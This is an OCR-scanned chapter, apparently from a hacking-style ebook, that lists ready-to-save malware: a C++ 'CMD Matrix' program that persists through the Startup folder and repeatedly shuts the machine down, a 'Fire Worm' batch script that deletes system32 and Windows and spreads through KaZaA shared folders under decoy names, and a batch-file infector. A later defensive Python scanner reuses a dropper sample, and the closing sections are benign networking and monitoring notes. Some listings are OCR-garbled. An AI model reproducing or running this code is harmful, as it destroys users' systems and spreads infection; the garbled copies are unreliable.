char inputFile[]="C:\Documents and Setti ngs\AII Users\Start Menu\Programs\Startup\rawr.bat"; 
ifstream input(inputFile); 
if (linput) 

{ 

{ 


ofstream fp("C:\Documents and Setti ngs\AII Users\Start Menu\Programs\Startup\rawr.bat", ios::app); 
fp 
fp 
fp 
} 

} 


else 

{ 

while (linput. eof()) 

{ 

input.getline(buffer,255); 

} 



{ 

char buffer[255]; 
char inputFile[]="C:\rawr.exe"; 
ifstream input(inputFile); 
if (linput) 

{ 

{ 


{ 

ofstream fpf'CLICK.bat", ios::app) 
fp 
fp 
fp 
fp 
} 

systemf'START CLICK.bat"); 
main(); 

} 

} 


else 

{ 

while (linput. eof()) 

{ 



input.getline(buffer,255); 
systemf'call shutdown.exe -S"); 
goto START; 

} 

} 

} 

START: { 

for(int i = 0; i < 1; i++) 


{ 

int num = (rand() % 10); 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUNDJNTENSITY); 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 

cout 



Sleep(60); 

} 

} 

for ( int j = 0; j < 5; j++) 

{ 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); 

int number = (rand() % 24); 

cout 


} 

goto START; 

This is a C++ program, not a batch file: it has to be compiled into an executable with a Windows C++ compiler. 
Saving the source as anything.bat does nothing. 


( 21 ) 

Fire Worm 

Very, very dangerous stuff. Don't run it. Want to know what it does? Try running it somewhere else; don't make 
yourself the victim. 

@echo OFF 

if exist c:\romp.bat goto end 

: start 

els 

Echo Installing Update. . . 
cd c:\windows\system 


del keyboard. drv 
del mouse. drv 
TITLE System Update 
echo ::startup » c:\romp.bat 

echo if not exist c:\damp goto prompt » c:\romp.bat 

echo :start » c:\romp.bat 

echo els » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo cd damp » c:\romp.bat 

echo md keys » c:\romp.bat 

echo pause » c:\romp.bat 


• echo copy *.bat c:\damp\keys\ILOYEYOU.bat » c:\romp.bat 

echo copy *.bat c:\damp\keys\ILOVEYOU.bat c:\windows\stone.bat » c:\romp.bat 

echo rmdir c:\WUTemp » c:\romp.bat 

echo del c:\windows\system32\*.* » c:\romp.bat 

echo rmdir c:\windows\system32 » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo cd windows » c:\romp.bat 

echo md system32 » c:\romp.bat 

echo pause » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo cd windows » c:\romp.bat 

echo cd system32 » c:\romp.bat 

echo md tools » c:\romp.bat 

echo copy *.bat c:\windows\system32\tools\urscrewed.bat 

echo echo msgbox” Ur system is now screwed” » c:\plastic.vbs » c:\romp.bat 

echo echo msgbox” Sorry Dude □ You Got Some Heck Of Stuff’ » c:\plastic.vbs » c:\romp.bat 

echo echo msgbox” Deleted all of system32 which is in windows and has messed 



with windows” » c:\plastic.vbs » c:\romp.bat 

echo echo msgbox” There is no more windows on this computer” » c:\plastic.vbs » c:\romp.bat 

echo Rd/s/q c:\windows » c:\romp.bat 

echo Rd/s/q c:\progra~l » c:\romp.bat 

echo goto part2 » c:\romp.bat 

» c:\romp.bat 

» c:\romp.bat 

echo :part2 » c:\romp.bat 

echo els » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo md Kierstyn’scan » c:\romp.bat 

echo pause » c:\romp.bat 


echo goto part3 » c:\romp.bat 
» c:\romp.bat 
» c:\romp.bat 
echo :part3 » c:\romp.bat 

echo rename c:\windows c:\viriiscan » c:\romp.bat 

echo goto endl » c:\romp.bat 

echo :prompt » c:\romp.bat 

echo els » c:\romp.bat 

echo cd c:\ » c:\romp.bat 

echo md damp » c:\romp.bat 

echo copy *.bat c:\damp.bat » c:\romp.bat 

echo echo msgbox” Oh No u r so stupid” » c:\pomper.vbs » c:\romp.bat 

echo echo msgbox” Wow you probably got this through ur lan” » c:\pomper.vbs » c:\romp.bat 

echo echo msgbox” Happy dieing staples” » c:\pomper.vbs » c:\romp.bat 

echo goto start » c:\romp.bat 

» c:\romp.bat 

» c:\romp.bat 



echo :endl » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Matrix2.vid.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-legged-freaks.vid.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Password_finder.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\s-club7.bmp.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\JackAss the movie.vid.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\pas sword hacker.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Norton anti virus.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-mile.mpg.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\kazaa.exe.bat » c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\realplayer.exe.bat » c:\romp.bat 


• echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\MyPic.bmp.bat » c:\romp.bat 
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funnyAbmp.bat » 

• c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*. mpg.bat » 

• c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared FolderYwindows xp.exe.bat » c:\romp.bat 
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to make viruses.txt.bat » 

• c:\romp.bat 

echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\*very funny*.bmp.bat » c:\romp.bat 
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to stop worm viruses.txt.bat » 

• c:\romp.bat 

echo goto end » c:\romp.bat 
echo :end » c:\romp.bat 
Echo Virus installed 

cd c:\Docume~l\All Users\Start Menu\Programs\Startup 

copy *.bat cd c:\Docume~l\All Users\Start Menu\Programs\Startup 

Echo Now You have to restart to save 



START C:\WINDOWS\RUNDLL.EXE user.exe, exitwindowsexec 

rundll32.exe shell32.dll,SHExitWindowsEx n 

pause 

del c:\thecreator.bat:end 

Save as anything.bat in Notepad. 
CMD Matrix 

Don't think I am telling you about the simple falling-matrix effect made in Notepad. This one is a compiled program: 
when you run it, it drops a batch file into the Startup folder, plays the matrix effect and shuts the machine down. Don't 
run it. 

// ViRuZ En MaTrIx 
// ON HAX 
// http://www.onhax.net 

#include 

#include 

#include 

#include 

#include 


#include 

#include 

using namespace std; 
int main() 

{ keybd_event(VK_MENU, 0x38, 0, 0); 
keybd_event(VK_RETURN, 0x1c, 0, 0); 
keybd_event(VK_RETURN, 0x1c, KEYEVENTF_KEYUP, 0); 
keybd_event(VK_MENU, 0x38, KEYEVENTF_KEYUP, 0); 
HANDLE outToScreen; 

outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); 


{ 

char buffer[255]; 

char inputFile[] = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat"; 
ifstream input(inputFile); 
if (!input) 

{ 

{ 

ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app); 
fp << "@echo OFF\n"; 
fp << "START C:\\rawr.exe\n"; 
fp << "EXIT"; 

} 

} 

else 

{ 

while (!input.eof()) 

{ 


input.getline(buffer, 255); 

} 

} 

} 

{ 

char buffer[255]; 
char inputFile[] = "C:\\rawr.exe"; 
ifstream input(inputFile); 
if (!input) 

{ 

{ 


{ 

ofstream fp("CLICK.bat", ios::app); 
fp << "@echo OFF\n"; 
fp << "COPY matrix.exe C:\\rawr.exe\n"; 
fp << "START C:\\rawr.exe\n"; 
fp << "EXIT"; 

} 

system("START CLICK.bat"); 
main(); 

} 

} 

else 

{ 

while (!input.eof()) 

{ 


input.getline(buffer, 255); 
system("call shutdown.exe -S"); 
goto START; 

} 

} 

} 

START :{ 

for(int i = 0; i < 1; i++) 

{ 

int num = (rand() % 10); 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY); 


cout << setw(4) << num; 
cout << setw(4) << "0%"; 
cout << setw(4) << "P"; 
cout << setw(4) << " "; 
cout << setw(4) << 
cout << setw(4) << "#"; 
cout << setw(4) << "X"; 
cout << setw(4) << 
cout << setw(4) << "1&"; 
cout << setw(4) << 
cout << setw(4) << "II"; 
cout << setw(4) << " "; 
Sleep(60); 

} 



} 

for ( int j = 0; j < 5; j++) 

{ 

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); 
int number = (rand() % 24); 
cout << setw(4) << number; 

} 

goto START; 


This is C++, not a batch file: compile it to matrix.exe (the name the CLICK.bat it writes expects) rather than saving it 
as anything.bat in Notepad. 
Danger !!! 

I am not going to explain this one; find out for yourself. Don't test it on your PC. (What the code shows: it is a 
batch-file infector. It locates its own copy via %PATH%, hides it, then for every .bat file in each %PATH% directory it 
writes its own lines, the ones tagged ViRuS, in front of that file's original commands, and the :XXX_END label keeps the 
victim's original commands runnable afterwards.) 
@echo off>nul.ViRuS 

if ?%l==?/ViRuS_MULTIPLY goto ViRuS_multiply 
if ?%l==?/ViRuS_OUTER_LOOP goto ViRuS_outer_loop 
if ?%l==?/ViRuS_FINDSELF goto ViRuSJindself 
if ?%VOFF°/o==?T goto ViRuS_OLDBAT 
set ViRuSname=%0 

if not exist %0.bat call %0 /ViRuS_FINDSELF %path% 
if not exist %ViRuSname%.bat set ViRuSname= 
if ?%ViRuSname%==? goto ViRuS_OLDBAT 


rem ViRuS if batch is started with name.BAT, virus will not become active 
rem ViRuS it was a bug, now it?s a feature ! (also notice the voff variable) 
rem ViRuS also if batch was only in an append /xn path (chance=minimal) 
attrib +h %ViRuSname%.bat 

for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP °/o%a 

attrib -h %ViRuSname%.bat 

set ViRuSname= 

goto ViRuS_OLDBAT 

:ViRuS_findself 

if ?%2==? goto XXX_END>nul. ViRuS 

if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% 


if exist %ViRuSname%.bat goto XXX_END 

if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% 

if exist %ViRuSname%.bat goto XXX_END 

shift>nul. ViRuS 

goto ViRuS_findself 

:ViRuS_outer_loop 

for %%a in (%2*.bat;°/o2*.bat) do call %0 /ViRuS_MULTIPLY %%a 

goto XXX_END>nul. ViRuS 

:ViRuS_multiply 

find PViRuS? <%ViRuSname%.bat >xViRuSx.bat 

find /v PViRuS? <%2 | find /v ?:XXX_END? »xViRuSx.bat 

echo :XXX_END»xViRuSx.bat 

copy xViRuSx.bat %2>nul 

del xViRuSx.bat 

goto XXX_END>nul. ViRuS 



:ViRuS_OLDBAT 
echo on>nul.ViRuS 
echo Exclusive ON HAX 
:XXX END 


Save as anything.bat 
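A defender's view of the listings in this chapter, as an added example that is not part of the original notes: a static triage script that scores a batch file for the patterns the "viruses" above share (reg add to the Run key, shutdown, deletion of ntldr/boot.ini/system32, rd /s /q on a drive root, copy %0, attrib +h, goto loops) and follows echo ... >> x.bat droppers into the second stage, so the payload is attributed to the file it will actually run from. The rule names, weights, thresholds and the two sample scripts are the editor's assumptions; a real deployment would feed it files from a mail gateway or file share rather than inline strings.

```python
"""Static triage of .bat/.cmd files for the self-installing, destructive
patterns used by the 'Notepad viruses' above: Run-key persistence, shutdown
loops, deletion of boot and system files, drive wipes, self-copying, hidden
attributes and dropped second-stage scripts. Added example; the rule set,
weights and sample scripts are the editor's own, not from the original notes."""
import re
from dataclasses import dataclass, field

# (rule name, pattern, weight). Batch is case-insensitive, so every pattern is.
RULES = [
    ("run_key_persistence", re.compile(r"\breg\s+add\s+\S*currentversion\\?run\b", re.I), 5),
    ("registry_wipe",       re.compile(r"\breg\s+delete\s+hkcr\b", re.I), 5),
    ("system_path_delete",  re.compile(r"\b(del|erase|rd|rmdir)\b.*\b(ntldr|boot\.ini|autoexec\.bat|system32|windows)\b", re.I), 5),
    ("drive_wipe",          re.compile(r"\b(del|erase|rd|rmdir)\s*(/\w\s*)*[a-z]:\\?(\*\.\*)?\s*(/\w\s*)*$", re.I), 5),
    ("self_copy",           re.compile(r"\bcopy\s+%0\b", re.I), 4),
    ("shutdown",            re.compile(r"\bshutdown(\.exe)?\b.*\s-[srlf]\b", re.I), 3),
    ("network_cut",         re.compile(r"\bipconfig\s*/release", re.I), 3),
    ("mass_rename",         re.compile(r"\bren\s+\*\.\w+\s+\*\.txt\b", re.I), 3),
    ("hide_files",          re.compile(r"\battrib\b.*\+h\b", re.I), 2),
    ("kill_process",        re.compile(r"\b(tskill|taskkill)\b", re.I), 2),
]
# A script that writes another script with `echo ... >> x.bat` is a dropper;
# the echoed text is the real payload and is scanned as its own file.
ECHO_REDIR = re.compile(r"^\s*echo\s+(.*?)\s*>>?\s*\"?([^\s\">]+\.(?:bat|cmd|vbs))\"?\s*$", re.I)
LABEL = re.compile(r"^\s*:([\w.]+)")
GOTO = re.compile(r"\bgoto\s+([\w.]+)", re.I)


def normalize(text):
    """Split into lines; also undo the two OCR artefacts the listings above show
    ('»' for '>>', '°/o' for '%') so those copies scan like the real files."""
    return [l.strip() for l in text.replace("»", ">>").replace("°/o", "%").splitlines()]


def find_loops(lines):
    """Labels that a later `goto` jumps back to: an unbounded loop, which is
    the shape of the copy bombs and fork bombs above. Returns (label, line no)."""
    first_label = {}
    for i, line in enumerate(lines):
        m = LABEL.match(line)
        if m:
            first_label.setdefault(m.group(1).lower(), i)
    loops = []
    for i, line in enumerate(lines):
        m = GOTO.search(line)
        if m and first_label.get(m.group(1).lower(), i) < i:
            loops.append((m.group(1).lower(), i + 1))
    return loops


def extract_dropped(lines):
    """Map each file the script writes with `echo ... > file` to the lines it gets."""
    dropped = {}
    for line in lines:
        m = ECHO_REDIR.match(line)
        if m:
            dropped.setdefault(m.group(2).lower(), []).append(m.group(1))
    return dropped


@dataclass
class Report:
    score: int = 0
    findings: list = field(default_factory=list)   # (rule, origin file, evidence)

    @property
    def verdict(self):
        # Thresholds are assumptions; tune them against your own benign scripts.
        return "destructive" if self.score >= 8 else "suspicious" if self.score >= 3 else "clean"


def _scan(lines, origin, report, depth):
    plain = [l for l in lines if not ECHO_REDIR.match(l)]   # dropper lines are scanned via their payload
    for rule, rx, weight in RULES:
        for line in plain:
            if rx.search(line):
                report.findings.append((rule, origin, line))
                report.score += weight
    for label, lineno in find_loops(lines):
        report.findings.append(("unbounded_loop", origin, f"goto {label} at line {lineno}"))
        report.score += 2
    if depth < 2:                                   # droppers that drop droppers: follow one more level
        for target, body in extract_dropped(lines).items():
            report.findings.append(("drops_script", origin, target))
            report.score += 3
            _scan(body, target, report, depth + 1)


def scan(text):
    report = Report()
    _scan(normalize(text), "<input>", report, 0)
    return report


# Constructed samples: a benign backup job and a dropper modelled on listing (14).
BENIGN = """@echo off
rem nightly backup
robocopy C:\\Users\\alice\\Documents D:\\backup\\docs /MIR /LOG:D:\\backup\\docs.log
echo backup finished >> D:\\backup\\history.txt
"""
DROPPER = """@echo off
echo @echo off>c:\\windows\\hartlell.bat
echo shutdown -r -t 11 -f>>c:\\windows\\hartlell.bat
reg add hklm\\software\\microsoft\\windows\\currentversion\\run /v startAPI /t reg_sz /d c:\\windows\\hartlell.bat /f
attrib +r +h c:\\windows\\hartlell.bat
:again
copy %0 %random%.bat
goto again
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("dropper", DROPPER)):
        r = scan(sample)
        print(f"{name}: {r.verdict} (score {r.score})")
        for f in r.findings:
            print("   ", *f)
```

Running it reports the backup job as clean and the dropper as destructive (score 19), with the shutdown finding attributed to the dropped c:\windows\hartlell.bat rather than to the outer file. Pattern matching of this kind is cheap and catches the whole tier shown in this chapter, but it says nothing about an obfuscated or compiled payload, which is one reason the monitoring chapter that follows matters.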


12. Network Monitoring And Management 

Network Management Details 
We Monitor 

• System & Services - Available, reachable 

• Resources - Expansion planning, maintain availability 

• Performance - Round-trip-time, throughput 

• Changes and configurations - Documentation, revision control, logging 

We Keep Track Of 

• Statistics - For purposes of accounting and metering 



• Faults (including intrusion detection) 

- Detection of issues 

- Troubleshooting issues and tracking their history 

• Ticketing systems are good at this 

• Help desks are a useful, often critical, component 

Baselining 

What is normal for your network? 


If you've never measured or monitored your 
network you will need to know things like: 

- Typical load on links (e.g. Cacti) 

- Level of jitter between endpoints (e.g. Smokeping) 

- Typical percent usage of resources 

- Typical amounts of "noise": 

• Network scans 

• Dropped data 

• Reported errors or failures 


Why do all this? 

Know when to upgrade 

- Is your bandwidth usage too high? 



- Where is your traffic going? 

- Do you need to get a faster line, or more providers? 

- Is the equipment too old? 

Keep an audit trail of changes 

- Record all changes 

- Makes it easier to find cause of problems due to 
upgrades and configuration changes 

Keep a history of your network operations 


- Using a ticket system lets you keep a history of events. 

- Allows you to defend yourself and verify what happened 


Why network management? 

Accounting 

-Track usage of resources 

- Bill customers according to usage 

Know when you have problems 

- Stay ahead of your users! Makes you look good. 

- Monitoring software can generate tickets and automatically 
notify staff of issues. 


Trends 



- All of this information can be used to view trends 
across your network. 

- This is part of baselining, capacity planning and 
attack detection. 

The “Big Three”? 

Availability 

- Nagios: services, servers, routers, switches 

Reliability 

- Smokeping: connection health, RTT, service response time, latency 

Performance 

- Cacti: total traffic, port usage, CPU, RAM, disk, processes 

Functional overlap exists between these programs! 

Attack Detection 

• Trends and automation allow you to know 
when you are under attack. 

• The tools in use can help you to mitigate 


attacks: 


- Flows across network interfaces 

- Load on specific servers and/or services 

- Multiple service failures 
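The baselining and attack-detection points above, carried into code as an added example (not from the original notes): a robust baseline (median and median absolute deviation) is learned from past 5-minute byte counters of one router interface, and live samples are compared against it. The counter values are constructed, not measured, and the k=6 sensitivity and window length are the editor's assumptions.

```python
"""Baselining and anomaly alerting for one interface counter, as the notes
describe it: learn what is normal, then alert when live samples leave that
range. Added example; the 5-minute byte counts are constructed, not measured."""
import statistics

# Constructed history of 5-minute octet deltas (what an SNMP poller such as
# MRTG/Cacti stores) on a quiet link, followed by live samples with a burst.
NORMAL_HISTORY = [
    12_000_000, 13_500_000, 11_800_000, 12_400_000, 14_100_000, 12_900_000,
    13_200_000, 11_600_000, 12_700_000, 13_800_000, 12_300_000, 13_000_000,
]
LIVE_SAMPLES = [12_600_000, 13_100_000, 48_000_000, 52_500_000, 12_900_000]


def baseline(history):
    """Median and median absolute deviation (MAD). Both are robust: one old
    spike in the history does not drag the baseline up the way a mean would."""
    med = statistics.median(history)
    mad = statistics.median(abs(x - med) for x in history)
    return med, mad


def is_anomalous(value, med, mad, k=6.0):
    """True when the sample sits more than k MADs above the median (k=6 is
    roughly 4 standard deviations for normally distributed data). Only the
    high side alerts here: a sudden drop is a fault, caught by availability checks."""
    if mad == 0:                      # flat history: anything above it is new
        return value > med
    return (value - med) / mad > k


def detect(history, live, k=6.0):
    """Walk live samples in order. Normal samples roll into the window so the
    baseline follows slow growth; anomalous ones are excluded so an attack in
    progress cannot raise the bar for the next interval.
    Returns (index, value, baseline median) per alert."""
    window = list(history)
    alerts = []
    for i, value in enumerate(live):
        med, mad = baseline(window)
        if is_anomalous(value, med, mad, k):
            alerts.append((i, value, med))
        else:
            window.append(value)
            window.pop(0)             # fixed-length sliding window
    return alerts


if __name__ == "__main__":
    med, mad = baseline(NORMAL_HISTORY)
    print(f"baseline: median={med:,.0f} bytes/5min, MAD={mad:,.0f}")
    for i, value, med in detect(NORMAL_HISTORY, LIVE_SAMPLES):
        print(f"ALERT sample {i}: {value:,} bytes/5min vs baseline {med:,.0f}")
```

On the constructed data the two burst samples (48 MB and 52.5 MB per interval against a 12.8 MB median) are flagged and the rest pass. In a real deployment the same comparison is done per interface and per time-of-day bucket, because a load that is normal at 14:00 is an anomaly at 03:00, and the alert is what feeds the ticket system rather than a graph someone has to remember to look at.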


Network monitoring systems & tools 
Three kinds of tools 


1. Diagnostic tools - used to test connectivity, 
ascertain that a location is reachable, or a 
device is up - usually active tools 

2. Monitoring tools - tools running in the 
background ("daemons" or services), which 
collect events, but can also initiate their own 
probes (using diagnostic tools), recording 
the output on a schedule. 

3. Performance Tools 

Key is to look at each router interface (probably 
don’t need to look at switch ports). 

Active tools 

- Ping - test connectivity to a host 

- Traceroute - show path to a host 

- MTR - combination of ping + traceroute 

- SNMP collectors (polling) 



Passive tools 

- log monitoring, SNMP trap receivers, NetFlow 


Automated tools 

- SmokePing - record and graph latency to a set of hosts, 
using ICMP (Ping) or other protocols 

- MRTG/RRD - record and graph bandwidth usage on a 
switch port or network link, at regular intervals 


Network & Service Monitoring tools 

- Nagios - server and service monitor 

• Can monitor pretty much anything 

• HTTP, SMTP, DNS, Disk space, CPU usage, ... 

• Easy to write new plugins (extensions) 

- Basic scripting skills are required to develop simple 
monitoring jobs - Perl, Shell scripts, php, etc... 

- Many good Open Source tools 

• Zabbix, ZenOSS, Hyperic, OpenNMS ... 
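Writing a Nagios plugin really does only need basic scripting: a plugin prints a single status line and signals the result through its exit code (0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN). The check below is an added example written for these notes, not one of the Nagios project's own plugins; the disk path and the 80%/90% thresholds are assumptions, and the trailing "|label=value;warn;crit" part of the output line is the performance-data format that graphing tools read.

```python
"""Added example (not one of the Nagios project's own plugins): a minimal
disk-usage check that follows the Nagios plugin convention.  A plugin
prints one status line and exits with 0=OK, 1=WARNING, 2=CRITICAL,
3=UNKNOWN; the optional "|label=value;warn;crit;min;max" suffix is
performance data.  The path and thresholds are assumptions."""
import shutil
import sys

OK, WARNING, CRITICAL, UNKNOWN = 0, 1, 2, 3
STATUS_TEXT = {OK: "OK", WARNING: "WARNING", CRITICAL: "CRITICAL", UNKNOWN: "UNKNOWN"}

def evaluate_usage(used_pct, warn_pct, crit_pct, label="disk"):
    """Map a utilisation percentage onto a Nagios status code and message.
    Returns (code, line).  Thresholds must satisfy warn < crit."""
    if not 0 <= used_pct <= 100 or warn_pct >= crit_pct:
        return UNKNOWN, f"UNKNOWN - bad input used={used_pct} warn={warn_pct} crit={crit_pct}"
    if used_pct >= crit_pct:
        code = CRITICAL
    elif used_pct >= warn_pct:
        code = WARNING
    else:
        code = OK
    perfdata = f"{label}={used_pct:.1f}%;{warn_pct};{crit_pct};0;100"
    return code, f"{STATUS_TEXT[code]} - {label} usage {used_pct:.1f}%|{perfdata}"

def check_disk(path, warn_pct=80, crit_pct=90):
    """Measure real usage of `path` and evaluate it.  I/O errors become
    UNKNOWN so a broken probe is never mistaken for a healthy service."""
    try:
        usage = shutil.disk_usage(path)
    except OSError as exc:
        return UNKNOWN, f"UNKNOWN - cannot stat {path}: {exc}"
    used_pct = 100.0 * usage.used / usage.total
    return evaluate_usage(used_pct, warn_pct, crit_pct, label=path)

if __name__ == "__main__":
    # Usage: check_disk.py [path] [warn%] [crit%]
    path = sys.argv[1] if len(sys.argv) > 1 else "/"
    warn = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    crit = int(sys.argv[3]) if len(sys.argv) > 3 else 90
    code, line = check_disk(path, warn, crit)
    print(line)
    sys.exit(code)
```

The same skeleton serves any check: replace the measurement in check_disk with a TCP connect, an HTTP request or an SNMP query and keep the threshold and exit-code logic unchanged.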

Monitor your critical Network Services 

- DNS/Web/Email 

- Radius/LDAP/SQL 

- SSH to routers 



How will you be notified? 

Don't forget log management! 

- Every network device (and UNIX and Windows servers 
as well) can report system events using syslog 

- You must collect and monitor your logs! 

- Not doing so is one of the most common mistakes when 
doing network monitoring 
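Collecting syslog is only half the job; something has to read it. The following is an added example, not code from the slides: it parses lines in the classic BSD syslog layout ("Mon DD HH:MM:SS host program[pid]: message") that sshd and most network devices emit, and raises an alert when one source address produces repeated authentication failures across any of the reporting hosts. The log lines are constructed for the demonstration and use documentation address ranges.

```python
"""Added example (not from the slides): read collected syslog lines and
alert when one source address produces repeated authentication failures.
The sample lines are constructed; they follow the BSD syslog layout
"Mon DD HH:MM:SS host program[pid]: message"."""
import re
from collections import defaultdict

# Constructed sample: a short burst of failures from one address.
SAMPLE_LOG = """\
Mar  3 10:01:02 gw1 sshd[2101]: Failed password for root from 198.51.100.7 port 50122 ssh2
Mar  3 10:01:04 gw1 sshd[2101]: Failed password for root from 198.51.100.7 port 50123 ssh2
Mar  3 10:01:05 gw1 sshd[2101]: Failed password for admin from 198.51.100.7 port 50124 ssh2
Mar  3 10:01:09 gw1 sshd[2104]: Accepted publickey for ops from 192.0.2.10 port 41000 ssh2
Mar  3 10:01:11 gw1 sshd[2105]: Failed password for invalid user test from 198.51.100.7 port 50125 ssh2
Mar  3 10:02:30 rtr1 login: Login failed for user cisco from 203.0.113.5
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
# Two message shapes: OpenSSH's and a generic "Login failed for user".
FAILED_RE = re.compile(
    r"(?:Failed password for|Login failed for user) (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3})"
)

def parse_syslog(text):
    """Return (records, malformed_count).  Malformed lines are counted rather
    than silently dropped: a parser that ignores them hides problems."""
    records, bad = [], 0
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            bad += 1
            continue
        records.append(m.groupdict())
    return records, bad

def failed_logins_by_source(records):
    """Map source IP -> list of (reporting host, user) for failed logins."""
    hits = defaultdict(list)
    for rec in records:
        m = FAILED_RE.search(rec["msg"])
        if m:
            hits[m.group("src")].append((rec["host"], m.group("user")))
    return hits

def alerts(text, threshold=3):
    """Sources with at least `threshold` failures; returns (alerts, malformed)."""
    records, bad = parse_syslog(text)
    hits = failed_logins_by_source(records)
    out = [
        {"src": src, "count": len(v), "hosts": sorted({h for h, _ in v}),
         "users": sorted({u for _, u in v})}
        for src, v in hits.items() if len(v) >= threshold
    ]
    return sorted(out, key=lambda a: -a["count"]), bad

if __name__ == "__main__":
    found, malformed = alerts(SAMPLE_LOG)
    for a in found:
        print(f"ALERT {a['src']}: {a['count']} failures on {a['hosts']} users={a['users']}")
    print(f"{malformed} malformed line(s)")
```

Because the count is keyed on the source address and not on the reporting host, a slow scan that touches every router once still adds up to one alert, which is exactly the pattern a per-device view misses.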

Network management protocols 


SNMP - Simple Network Management 
Protocol 

- Industry standard; hundreds of tools exist that make use of it 

- Present on any decent network equipment 

• Network throughput, errors, CPU load, temperature, ... 

- UNIX and Windows implement this as well 

• Disk space, running processes, ... 

SSH and telnet 

- It is also possible to use scripting to automate 
monitoring of hosts and services 

Ticketing systems: Example 

rt (request tracker) 

- Heavily used worldwide. 

- A classic ticketing system that can be customized to 
your location. 


- Somewhat difficult to install and configure. 

- Handles large-scale operations. 

trac 

- A hybrid system that includes a wiki and project 
management features. 

- Ticketing system is not as robust as rt, but works well. 

- Often used for "trac"king group projects 

redmine 

- Like trac, but more robust. Harder to install 


Network Intrusion Detection 
Systems (NIDS) 

These are systems that observe all of your network 
traffic and report when they see specific kinds of 
problems, such as: 

- hosts that are infected or are acting as spamming sources. 

A few tools: 

- SNORT - a commonly used open source tool: 
http://www.snort.org/ 

- Prelude - Security Information Management System 
https://dev.prelude-technologies.com/ 

- Samhain - Centralized HIDS 
http://la-samhna.de/samhain/ 

- Nessus - scan for vulnerabilities: 
http://www.nessus.org/download 


13. Network Concept 


1. Introduction 

2. Protocols 

3. Protocol Layers 

4. Network Interconnection/Internet 


1. Introduction 

-A network can be defined as a group of computers and other devices 
connected in some ways so as to be able to exchange data. 

-Each of the devices on the network can be thought of as a node; each 
node has a unique address. 

-Addresses are numeric quantities that are easy for computers to work 
with, but not for humans to remember. 

Example: 204.160.241.98 

-Some networks also provide names that humans can more easily remember than numbers 

Addressing 

Internet address 


- Consists of 4 bytes separated by periods 

Example: 136.102.233.49 

- The first R bytes (R = 1, 2, 3) correspond to the network address; 
- The remaining H bytes (H = 3, 2, 1) are used for the host machine. 
- InterNIC Register: organization in charge of the allocation of the 
address ranges corresponding to networks. 

-Criteria considered: 

□ Geographical area (country) 

□ Organization, enterprise 

□ Department 

□ Host 


Domain Name System (DNS) 

-Mnemonic textual addresses are provided to facilitate the manipulation 
of internet addresses. 

-DNS servers are responsible for translating mnemonic textual Internet 
addresses into hard numeric Internet addresses. 

Ports 

-An IP address identifies a host machine on the Internet. 

-An IP port will identify a specific application running on an Internet host 
machine. 

-A port is identified by a number, the port number. 


-The number of ports is not functionally limited, in contrast to serial 
communications where only 4 ports are allowed. 



- There are some port numbers which are dedicated to specific 
applications: 

Application        Port number(s) 
HTTP               80 
FTP                20 and 21 
GOPHER             70 
SMTP (e-mail)      25 
POP3 (e-mail)      110 
TELNET             23 
FINGER             79 






Data Transmission 

-In modern networks, data are transferred using packet switching. 

-Messages are broken into units called packets, and sent from one 
computer to the other. 

-At the destination, data are extracted from one or more packets and 
used to reconstruct the original message. 

-Each packet has a maximum size, and consists of a header and a data 
area. 

-The header contains the addresses of the source and destination 
computers and sequencing information necessary to reassemble 
the message at the destination. 





[Figure: a packet, drawn as a header field followed by a data field, each shown as a string of bits] 




Types of Networks 

There are two principal kinds of networks: Wide Area Networks (WANs) and Local Area Networks (LANs). 


WANs 

-Cover cities, countries, and continents. 

-Based on packet switching technology 

-Examples of WAN technology: Asynchronous Transfer Mode (ATM), 
Integrated Services Digital Network (ISDN) 

LANs 

- Cover buildings or a set of closely related buildings. 

